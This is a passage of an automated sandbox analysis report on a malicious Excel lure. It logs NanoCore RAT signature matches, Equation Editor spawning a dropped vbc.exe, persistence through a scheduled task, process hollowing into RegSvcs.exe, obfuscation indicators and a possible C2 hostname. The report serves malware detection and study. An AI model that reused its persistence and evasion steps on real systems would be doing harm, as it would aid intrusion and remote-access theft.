Source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: vbc.exe PID: 2364, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: vbc.exe PID: 2364, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 2624, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 2624, type: MEMORYSTRMatched rule: CobaltStrike_C2_Host_Indicator date = 2019-08-16, author = yara@s3c.za.net, description = Detects CobaltStrike C2 host artifacts
Source: Process Memory Space: RegSvcs.exe PID: 2624, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Users\Public\vbc.exeCode function: 6_2_00300610
Source: C:\Users\Public\vbc.exeCode function: 6_2_00301979
Source: C:\Users\Public\vbc.exeCode function: 6_2_00301060
Source: C:\Users\Public\vbc.exeCode function: 6_2_00301E8E
Source: C:\Users\Public\vbc.exeCode function: 6_2_003009C8
Source: C:\Users\Public\vbc.exeCode function: 6_2_00300236
Source: C:\Users\Public\vbc.exeCode function: 6_2_00301E76
Source: C:\Users\Public\vbc.exeCode function: 6_2_00301C78
Source: C:\Users\Public\vbc.exeCode function: 6_2_00301E48
Source: C:\Users\Public\vbc.exeCode function: 6_2_00301EDB
Source: C:\Users\Public\vbc.exeCode function: 6_2_00458418
Source: C:\Users\Public\vbc.exeCode function: 6_2_00453AC8
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045D6D8
Source: C:\Users\Public\vbc.exeCode function: 6_2_00454CF0
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045DAF0
Source: C:\Users\Public\vbc.exeCode function: 6_2_004560F8
Source: C:\Users\Public\vbc.exeCode function: 6_2_004564B8
Source: C:\Users\Public\vbc.exeCode function: 6_2_00450100
Source: C:\Users\Public\vbc.exeCode function: 6_2_00457B38
Source: C:\Users\Public\vbc.exeCode function: 6_2_004573E0
Source: C:\Users\Public\vbc.exeCode function: 6_2_00455BAA
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B040
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B050
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045DA58
Source: C:\Users\Public\vbc.exeCode function: 6_2_00456860
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B470
Source: C:\Users\Public\vbc.exeCode function: 6_2_00455E08
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B221
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B230
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045CEC2
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045AAD0
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045C8D0
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045AAD8
Source: C:\Users\Public\vbc.exeCode function: 6_2_004560E9
Source: C:\Users\Public\vbc.exeCode function: 6_2_004500F0
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B480
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A0A9
Source: C:\Users\Public\vbc.exeCode function: 6_2_004564A8
Source: C:\Users\Public\vbc.exeCode function: 6_2_004540B1
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A0B8
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045EB60
Source: C:\Users\Public\vbc.exeCode function: 6_2_00453B6A
Source: C:\Users\Public\vbc.exeCode function: 6_2_00457330
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045E3C1
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045E3C8
Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B5F9
Source: C:\Users\Public\vbc.exeCode function: 6_2_00455DF8
Source: C:\Users\Public\vbc.exeCode function: 6_2_00457F80
Source: C:\Users\Public\vbc.exeCode function: 6_2_00454DA8
Source: C:\Users\Public\vbc.exeCode function: 6_2_00C80DD5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003B3020
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003B2418
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003B38C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003B9D20
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003B9120
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003BEA80
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003BC3E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003BB7E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003BC4A7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003B30E7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003B9DE7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003BA5C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_02388218
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_02384FE0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_02385BE0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_02386488
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_02388E18
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_02388EDF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_0238777B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_02385CA7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_0238912B
Source: C:\Users\Public\vbc.exeCode function: 6_2_00490ACE NtQuerySystemInformation,
Source: C:\Users\Public\vbc.exeCode function: 6_2_00490A9D NtQuerySystemInformation,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003F114A NtQuerySystemInformation,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003F110F NtQuerySystemInformation,
Source: nano[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: nano[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: nano[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: smsBuojZSZn.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: smsBuojZSZn.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: smsBuojZSZn.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMemory allocated: 76E90000 page execute and read and write
Source: nano[1].exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: smsBuojZSZn.exe.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: F99 SEP-15 Price Inquiry.xlsxReversingLabs: Detection: 28%
Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................-.........E.R.R.O.R.:. ...T.......................1.......................................8.........................-.....
Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................-.........E.R.R.O.(.P.....T.......................7...............................................X.................-.....
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\smsBuojZSZn' /XML 'C:\Users\user\AppData\Local\Temp\tmpC2C3.tmp'
Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\smsBuojZSZn' /XML 'C:\Users\user\AppData\Local\Temp\tmpC2C3.tmp'
Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
Source: C:\Users\Public\vbc.exeCode function: 6_2_00490952 AdjustTokenPrivileges,
Source: C:\Users\Public\vbc.exeCode function: 6_2_0049091B AdjustTokenPrivileges,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003F0F0A AdjustTokenPrivileges,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_003F0ED3 AdjustTokenPrivileges,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$F99 SEP-15 Price Inquiry.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF8B0.tmpJump to behavior
Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@8/25@31/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\TSQuFEHGeCfwEOqlj
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{42fc7104-2795-42db-8417-dc7142ab8b68}
Source: vbc.exeString found in binary or memory: erminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle>
Source: vbc.exeString found in binary or memory: erminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle>
Source: nano[1].exe.4.dr, u0003u2001.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: vbc.exe.4.dr, u0003u2001.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: smsBuojZSZn.exe.6.dr, u0003u2001.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.0.vbc.exe.cd0000.0.unpack, u0003u2001.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.2.vbc.exe.cd0000.1.unpack, u0003u2001.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ystem.pdb source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: bvcs.pdbg source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbPP source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: qC:\Windows\System.pdb source: RegSvcs.exe, 00000009.00000002.693310100.000000000550B000.00000004.00000001.sdmp
Source: Binary string: newmeforever12.3utilities.comsymbols\dll\System.pdbP source: RegSvcs.exe, 00000009.00000002.693310100.000000000550B000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\dll\System.pdb source: RegSvcs.exe, 00000009.00000002.692562534.00000000048ED000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.691051857.0000000000D30000.00000004.00020000.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 00000009.00000002.691445743.0000000002781000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 00000009.00000002.690789448.0000000000800000.00000004.00020000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: indows\System.pdbpdbtem.pdb source: RegSvcs.exe, 00000009.00000002.692562534.00000000048ED000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.691445743.0000000002781000.00000004.00000001.sdmp
Source: Binary string: System.pdb source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: System.pdbX source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 00000009.00000002.690837400.0000000000A00000.00000004.00020000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: RegSvcs.exe, 00000009.00000002.691415430.00000000024A6000.00000004.00000040.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpackerShow sources
Source: nano[1].exe.4.dr, u0003u2001.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc.exe.4.dr, u0003u2001.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: smsBuojZSZn.exe.6.dr, u0003u2001.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.vbc.exe.cd0000.0.unpack, u0003u2001.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.vbc.exe.cd0000.1.unpack, u0003u2001.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\Public\vbc.exeCode function: 6_2_00CD580E push ecx; iretd
Source: C:\Users\Public\vbc.exeCode function: 6_2_001572BC push eax; ret
Source: C:\Users\Public\vbc.exeCode function: 6_2_001574D4 pushfd ; ret
Source: C:\Users\Public\vbc.exeCode function: 6_2_0015726E push eax; ret
Source: C:\Users\Public\vbc.exeCode function: 6_2_00458E63 push E6FFFFFFh; retf
Source: C:\Users\Public\vbc.exeCode function: 6_2_00C80D25 push ecx; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_002174A8 push ebp; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_0021749C push ecx; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_0021989B push ecx; retf 0021h
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_00219D20 pushad ; retf
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_00219D1C push eax; retf
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_00CF01B9 push ecx; iretd
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 9_2_02380F71 push C300DB29h; ret
Source: initial sampleStatic PE information: section name: .text entropy: 7.89214580367
Source: initial sampleStatic PE information: section name: .text entropy: 7.89214580367
Source: initial sampleStatic PE information: section name: .text entropy: 7.89214580367
Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\smsBuojZSZn.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\smsBuojZSZn' /XML 'C:\Users\user\AppData\Local\Temp\tmpC2C3.tmp'

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
